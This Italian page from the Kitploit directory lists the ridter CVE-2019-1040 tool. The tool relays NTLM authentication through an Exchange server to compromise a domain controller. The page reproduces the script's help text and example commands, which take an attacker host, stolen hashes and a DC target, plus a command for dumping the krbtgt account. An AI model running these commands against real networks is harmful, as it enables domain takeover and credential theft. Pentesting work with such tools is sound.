Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-1040 — CVE-2019-1040 con Exchange | Kitploit
Strumenti/GitHubGitHub/ridter/cve-2019-1040
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateralePenetration Testing
GitHubridter/cve-2019-1040

CVE-2019-1040

CVE-2019-1040 con Exchange

Vedi Repository
250585 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-1040

Ottimo articolo! Sfruttare CVE-2019-1040 - Combinare vulnerabilità relay per RCE e Domain Admin .

Quindi, ho scritto CVE-2019-1040.py per un uso facile.

Puoi anche dare un'occhiata al mio repository exchange2domain: https://github.com/ridter/exchange2domain, un altro modo per usare Exchange per ottenere il DC.

Requisiti

Questi strumenti richiedono impacket. Puoi installarlo da pip con pip install impacket.

Utilizzo

root@kitploit:~
usage: CVE-2019-1040.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
                        [--hashes HASHES] [--smb-port [destination port]] -ah
                        ATTACKER_HOST [-ap ATTACKER_PORT] -th TARGET_HOST
                        [-t TIMEOUT]
                        [--exec-method [{smbexec,wmiexec,mmcexec}]]
                        [--just-dc-user USERNAME] [--debug]
                        EX_HOSTNAME

CVE-2019-1040 with Exchange

positional arguments:
  EX_HOSTNAME           Hostname/IP del server Exchange

optional arguments:
  -h, --help            mostra questo messaggio di aiuto ed esci
  -u USERNAME, --user USERNAME
                        nome utente per l'autenticazione
  -d DOMAIN, --domain DOMAIN
                        dominio in cui si trova l'utente (FQDN o nome dominio NETBIOS)
  -p PASSWORD, --password PASSWORD
                        Password per l'autenticazione, verrà richiesta se non specificata e non vengono forniti hash NT:NTLM
  --hashes HASHES       Hash LM:NLTM
  --smb-port [destination port]
                        Porta di destinazione per connettersi al server SMB
  -ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
                        Hostname o IP dell'attaccante
  -th TARGET_HOST, --target-host TARGET_HOST
                        Hostname o IP del DC
  -t TIMEOUT, --timeout TIMEOUT
                        timeout in secondi
  --exec-method [{smbexec,wmiexec,mmcexec}]
                        Metodo di esecuzione remota da utilizzare sul target (solo quando si usa -use-vss). Predefinito: smbexec
  --just-dc-user USERNAME
                        Estrai solo i dati NTDS.DIT per l'utente specificato. Disponibile solo per l'approccio DRSUAPI.
  --debug               Abilita output di debug

esempio:

root@kitploit:~
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip 
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip 

Se vuoi solo dumpare krbtgt, usa --just-dc-user.

esempio:

root@kitploit:~
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip  --just-dc-user krbtgt
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip --just-dc-user krbtgt

Scarica lo strumento